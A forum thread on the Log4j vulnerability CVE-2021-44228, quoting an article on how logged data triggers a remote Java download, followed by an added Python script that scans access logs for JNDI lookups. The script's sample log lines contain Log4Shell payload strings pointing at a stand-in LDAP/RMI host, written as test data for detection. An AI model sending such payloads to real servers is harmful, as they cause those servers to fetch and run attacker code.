Free Republic

To: vikingd00d

It’s not normally there.

This is a vulnerability that makes that happen to the OS.


4 posted on 12/12/2021 9:26:16 PM PST by ConservativeMind (Trump: Befuddling Democrats, Republicans, and the Media for the benefit of the US and all mankind.)


To: ConservativeMind

>>It’s not normally there.

Wrong. That “feature” was deliberately coded.

From a different article on it:

The bug, now officially denoted CVE-2021-44228, involves sending a request to a vulnerable server in which you include some data – for example, an HTTP header – that you expect (or know) the server will write to its logfile.

But you booby-trap that data so that the server, while wrangling the data into a format suitable for logging, kicks off a web download as an integral part of constructing the needed log entry.

And not just any old download: if the data that comes back is a valid Java program (a .class file, in the jargon), then the server runs that file to “help” it generate the logging data.

The trick is that, by default, unpatched versions of the Log4j library permit logging requests to trigger general-purpose LDAP (directory services) searches, as well as various other online lookups.


7 posted on 12/12/2021 9:34:28 PM PST by vikingd00d (chown -R us ~you/base)
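The mechanism described above (a logged field carrying a `${jndi:...}` lookup that points the server at an LDAP or other remote service) can be spotted from the log side. The scanner below is an added example, not code from either poster or the quoted article; the access-log lines, IP addresses and ports in it are constructed for illustration.

```python
import re
from typing import Optional

# Constructed sample access-log lines; the last field is the User-Agent header,
# one of the request fields a server commonly writes to its log.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Dec/2021:21:26:16 -0800] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:21:30:02 -0800] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:21:30:05 -0800] "GET /api HTTP/1.1" 404 0 "-" "${JNDI:rmi://203.0.113.7:1099/b}"',
    '10.0.0.3 - - [12/Dec/2021:21:31:40 -0800] "GET /?q=${env:HOME} HTTP/1.1" 200 12 "-" "curl/7.68"',
]

# A Log4j JNDI lookup has the shape ${jndi:<scheme>://<host>[:port]/<path>}.
# Matching is case-insensitive because Log4j treats the "jndi" prefix that way.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)(?::(\d+))?[^}]*\}",
    re.IGNORECASE,
)


def find_jndi_lookup(line: str) -> Optional[dict]:
    """Return scheme/host/port of the first JNDI lookup in a log line, or None."""
    m = JNDI_RE.search(line)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "host": m.group(2),
        "port": int(m.group(3)) if m.group(3) else None,
    }


def scan_log(lines):
    """Scan every log line; report line number plus the remote service it would contact."""
    hits = []
    for number, line in enumerate(lines, start=1):
        info = find_jndi_lookup(line)
        if info:
            hits.append({"line": number, **info})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme']} to {hit['host']}:{hit['port']}")
```

The fourth sample line contains a different `${...}` lookup and is deliberately not reported, so the check stays specific to the JNDI/remote-fetch path the article describes; since the lookup may sit in any field the server logs, run it over every logged header rather than one column.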
